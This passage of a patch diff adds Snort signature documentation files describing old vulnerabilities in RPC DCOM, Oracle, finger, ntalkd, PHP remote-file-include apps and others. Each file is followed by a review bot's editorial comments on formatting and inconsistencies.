+Difficult.  No known exploits available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/737
+
+--
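Review bot: the first line of the file, "Nigel:  Old reference pointed to something totally unrelated.", is an editorial note that should not ship in the documentation; drop it, and put "Rule:" / blank / "--" / "Sid:" in the same order as the other files (here "--" precedes a blank line and "Sid:"). Ease of Attack says "Difficult. No known exploits available." while Detailed Information says the denial of service simply consumes memory; say which of the two effects (memory exhaustion or file upload leading to command execution) the difficulty rating refers to.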
--- /dev/null
+++ b/doc/signatures/3156.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3156
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
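Review bot: this file is identical to 3286.txt apart from the Sid, including the Attack Scenarios paragraph about "an overly long filename via a network share" that does not match the DCOM RPC description and the "Expoit" typo. Two rules with different Sids presumably match different things (interface, opnum or transport); the Detailed Information of each should say what distinguishes them.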
--- /dev/null
+++ b/doc/signatures/696.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+696
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
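Review bot: Affected Systems is left blank and the Summary only says "a known vulnerability in Microsoft SQL" without saying which product, version or vulnerability the rule targets, so a reader cannot tell whether this applies to their deployment. Suggest naming the product (Microsoft SQL Server) and the affected versions under Affected Systems, and filling Additional References with the corresponding advisory; the Attack Scenarios text ("supply his/her own credentials to gain access") describes an authentication attempt rather than the exploit the Summary promises.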
--- /dev/null
+++ b/doc/signatures/326.txt
@@ -0,0 +1,72 @@
+Rule: 
+
+--
+Sid: 326
+
+-- 
+
+Summary: 
+This event is generated when a remote command execution exploit against
+a finger daemon is attempted.
+
+-- 
+Impact: 
+Serious. The attacker may be presented with the opportunity to run a
+command of his choice on the target UNIX system
+
+--
+Detailed Information:
+This event is generated when a specific attack against a vulnerable
+version of finger daemon is detected. 
+
+The Finger daemon is used to provide information about users on a UNIX
+system. It used to be installed and enabled by default on most
+UNIX/Linux systems. The attack may allow an attacker to execute a
+command remotely on a target system with the privileges of the user
+running the "finger" daemon. The user is usually defined in the
+/etc/inetd.conf file and is commonly designated as "nobody".
+
+--
+Attack Scenarios:  
+An attacker may try the attack and then executes a command to download a
+backdoor to the target system. He then connects to the system and may
+attempt to escalate his privileges by exploiting a local SUID
+application to gain "root" privileges.
+
+-- 
+Ease of Attack: 
+Simple, no exploit software is required, just a specially formatted finger query
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the
+service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS379
+
+Bugtraq:
+http://online.securityfocus.com/bid/974
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0150
+
+--
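Review bot: The Affected Systems section is missing entirely; the file goes straight from Detailed Information to Attack Scenarios, whereas every other file in this patch carries an "Affected Systems:" block. Suggest adding it (even if only "Systems running vulnerable finger daemons") so the layout matches the rest of doc/signatures. Minor: "Sid: 326" is on one line while other files put the number on the line after "Sid:", and the Impact sentence lacks a terminating period.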
--- /dev/null
+++ b/doc/signatures/100000355.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000355
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "eSyndiCat" application running on a webserver. Access to the file "cron.php" using a remote file being passed as the "path_to_config" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "path_to_config" parameter in the "cron.php" script used by the "eSyndiCat" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using eSyndiCat
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
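Review bot: The third Detailed Information paragraph ("gain unauthorized access to a CGI application running ona web server ... validating the credentials of a client host") is credential-check boilerplate that does not describe a remote file include via the "path_to_config" parameter of "cron.php"; suggest dropping it or replacing it with a sentence on how the included file is executed by the server. Also fix the typo "ona" (on a), the redundant "exploitation attempt has been attempted", the two leading blank lines before "Rule:", and consider adding the vulnerability reference under Additional References, which is empty.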
--- /dev/null
+++ b/doc/signatures/2887.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2887
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
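Review bot: The sentence naming the vulnerable procedure is split mid-sentence, with the period and "This procedure is included in" starting a new line after "drop_delete_resolution"; it should read "vulnerability in the procedure drop_delete_resolution. This procedure is included in sys.dbms_repcat_conf." on continuous lines. Affected Systems reads "Oracle Oracle9i" (duplicated vendor name) and Additional References is empty even though a specific package and procedure are identified.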
--- /dev/null
+++ b/doc/signatures/881.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+881
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Guide to network resource tools:
+http://www.acad.bg/beginner/gnrt/specialist/archie.html
+
+--
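Review bot: Neither the Summary nor Detailed Information says which CGI script this rule matches ("a CGI web application running on a server"), yet the only reference is "Guide to network resource tools ... archie.html", so the reference is orphaned from the text. Suggest naming the script in the Summary so a reader can connect the rule, the text and the reference. Also fix the typo "ona" in Detailed Information and wrap the over-long line "relationships between the victim server and other hosts can be exploited by the attacker." to match the rest of the file.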
--- /dev/null
+++ b/doc/signatures/993.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 993
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
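Review bot: The Impact line "Information gathering possible administrator access." is missing punctuation and should read "Information gathering. Possible administrator access." Detailed Information never says what request or file the rule looks for, while Attack Scenarios speaks of "a sensitive file containing information on the IIS implementation"; suggest naming the file or URI so the generic hardening advice in Corrective Action can be tied to a concrete check. Additional References is empty.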
--- /dev/null
+++ b/doc/signatures/2629.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2629
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "register_user_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "privilege_type" variable
+to cause the overflow. The result could permit the attacker to gain
+escalated privileges and run code of their choosing. This attack
+requires an attacker to logon to the database with a valid username
+and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck94.html
+
+--
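Review bot: Detailed Information only says the overflow "is triggered by a long string in a parameter", while Attack Scenarios later names it as the "privilege_type" variable; suggest naming the parameter in Detailed Information too, and the package the procedure lives in, as 2887.txt does with sys.dbms_repcat_conf. The $ORACLE_PORTS note is rule-configuration guidance rather than a description of the vulnerability and would sit better under Corrective Action. Minor: "a Oracle database" should be "an Oracle database", and Affected Systems is indented with spaces where other files use a tab.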
--- /dev/null
+++ b/doc/signatures/313.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 313
+
+--
+Summary:
+This event is generated when an attempt to exploit a buffer overflow condition in ntalkd is made.
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to gain remote access to the victim host or execute arbitrary code with the privileges of the superuser account.
+
+--
+Detailed Information:
+Some versions of the Network Talk Daemon (ntalkd) are vulnerable to a buffer overflow condition which can present the attacker with a root shell.
+
+Talk is used to communicate between users of UNIX based operating systems. A vulnerability exists such that a buffer overflow condition in talk can be exploited by a malicious user. This may then present the attacker with the opportunity to gain root access to the target system.
+
+Affected Versions:
+	Multiple vendors
+
+--
+Attack Scenarios:
+Once the overflow has been created, the attacker is able to supply incorrect hostname information to the target system and gain root access.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/210
+
+--
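Review bot: The "Affected Versions:" block is not preceded by a "--" separator and uses a different header from every other file in this patch ("Affected Systems:"); suggest inserting the separator after the Detailed Information paragraph and renaming the header so the files parse consistently. Also fix "compromize" in Impact, and note that Attack Scenarios puts the overflow before the malformed hostname ("Once the overflow has been created, the attacker is able to supply incorrect hostname information"), which reads as the reverse of the cause-and-effect order described in Detailed Information; confirm which is intended.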
--- /dev/null
+++ b/doc/signatures/100000847.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000847
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Sitemap" application running on a webserver. Access to the file "sitemap.xml.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "sitemap.xml.php" script used by the "Sitemap" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Sitemap
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
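Review bot: The "--" separators after the Sid, Affected Systems and Contributors blocks have no blank line before them, unlike the other files, and the file starts with two blank lines before "Rule:"; suggest normalising so the documents are parsed uniformly. Fix the typo "ona" in Detailed Information, and the third Detailed Information paragraph about "validating the credentials of a client host" does not describe a remote file include through the "mosConfig_absolute_path" parameter of "sitemap.xml.php" and should be dropped.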
--- /dev/null
+++ b/doc/signatures/100000677.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000677
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "topics.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "topics.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
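Review bot: Same layout problem as the other remote file include files: the "--" separators after Sid, Affected Systems and Contributors lack the preceding blank line, and the "ona" typo appears in Detailed Information. The credential-validation paragraph ("Some applications do not perform stringent checks when validating the credentials of a client host") is unrelated to the "header_prog" parameter of "topics.php" and should be removed; Additional References is empty.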
--- /dev/null
+++ b/doc/signatures/1052.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1052
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
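Review bot: The Summary and Detailed Information describe a generic directory traversal against "web, web applications and ftp servers", but Attack Scenarios is FTP-specific ("browse folders outside the ftp root directory"); suggest stating which protocol and path pattern the rule inspects so the two sections agree. Affected Systems and Additional References are both empty, and "technique, to browse" has a stray comma.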
--- /dev/null
+++ b/doc/signatures/2214.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2214
+
+--
+Summary:
+This event is generated when an attempt is made to access mailview.cgi on an internal web server. This may indicate an attempt to exploit a directory traversal vulnerability in MailStudio 2000 2.0 and earlier.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+MailStudio 2000 is mail server software for Solaris or Linux operating systems. It contains a vulnerability where data sent to mailview.cgi is not properly parsed. This can allow an attacker to use directory traversal techniques (/../) within the "html" parameter to view arbitrary files on the system, including other users' email, configuration files, and password files.
+
+--
+Affected Systems:
+Systems running MailStudio 2000 2.0 and earlier.
+
+--
+Attack Scenarios:
+An attacker sends a specially crafted HTTP request to a vulnerable web server with another user's email file as the html argument. The attacker will then be able to view the file.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses mailview.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been fixed. Contact the vendor, 3R Soft (http://www.3rsoft.com), for more information.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1335
+
+--
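Review bot: "Bugtraq" under Additional References lacks the trailing colon used in 326.txt and 313.txt ("Bugtraq:"); suggest matching the existing convention. Corrective Action says "It is not known if this vulnerability has been fixed" while Affected Systems already narrows it to "MailStudio 2000 2.0 and earlier"; if a fixed version is known it should be stated here, otherwise the two statements should be reconciled.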
--- /dev/null
+++ b/doc/signatures/3053.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3053
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
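Review bot: Additional References is empty although Affected Systems names "Ethereal 0.10.7 and prior" and Corrective Action tells the reader to "Upgrade to the latest non-affected version"; suggest adding the Ethereal advisory for the ACL/ACE size parsing fix and naming the first fixed version. Ease of Attack is rated "Moderate." while Attack Scenarios only requires crafting a packet with an ACE size of 0, which reads closer to the "Simple." rating used elsewhere; confirm the intended rating.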
--- /dev/null
+++ b/doc/signatures/2698.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+2698
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create file.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
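Review bot: "vulnerability in the procedure create file." names the procedure as two words, which is not a valid PL/SQL identifier; confirm the exact procedure name and its owning package from the rule (2887.txt in this patch gives both, e.g. "This procedure is included in sys.dbms_repcat_conf."). Affected Systems reads "Oracle Oracle9i" with the vendor name duplicated, and Additional References is empty.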
--- /dev/null
+++ b/doc/signatures/686.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid: 
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an SQL database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the protected network.
+
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
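Review bot: The Sid field is empty ("Sid: " with no number), so this file cannot be matched to its rule; the file name suggests 686 but the value must be filled in. Attack Scenarios reads "Simple. These are SQL database commands.", which is an Ease of Attack answer rather than a scenario, and the sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" appears to be copied from a telnet rule and does not fit an SQL-command rule. There is also no Affected Systems section.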
--- /dev/null
+++ b/doc/signatures/100000174.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000174
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in RSA Security RSA Authentication Agent For Web.
+
+-- 
+Impact: 
+Cross site scripting leading to possible inclusion of code of the attackers 
+choosing.
+
+--
+Detailed Information:
+A vulnerability exists in RSA Security RSA Authentication Agent For Web that 
+may allow an attacker to include code of their choosing due to the improper 
+checking of user supplied input.
+
+--
+Affected Systems:
+RSA Security RSA Authentication Agent For Web 5.2
+
+--
+Attack Scenarios: 
+An attacker can supply a link to include code of their choosing in data 
+supplied to RSA Security RSA Authentication Agent For Web.
+
+-- 
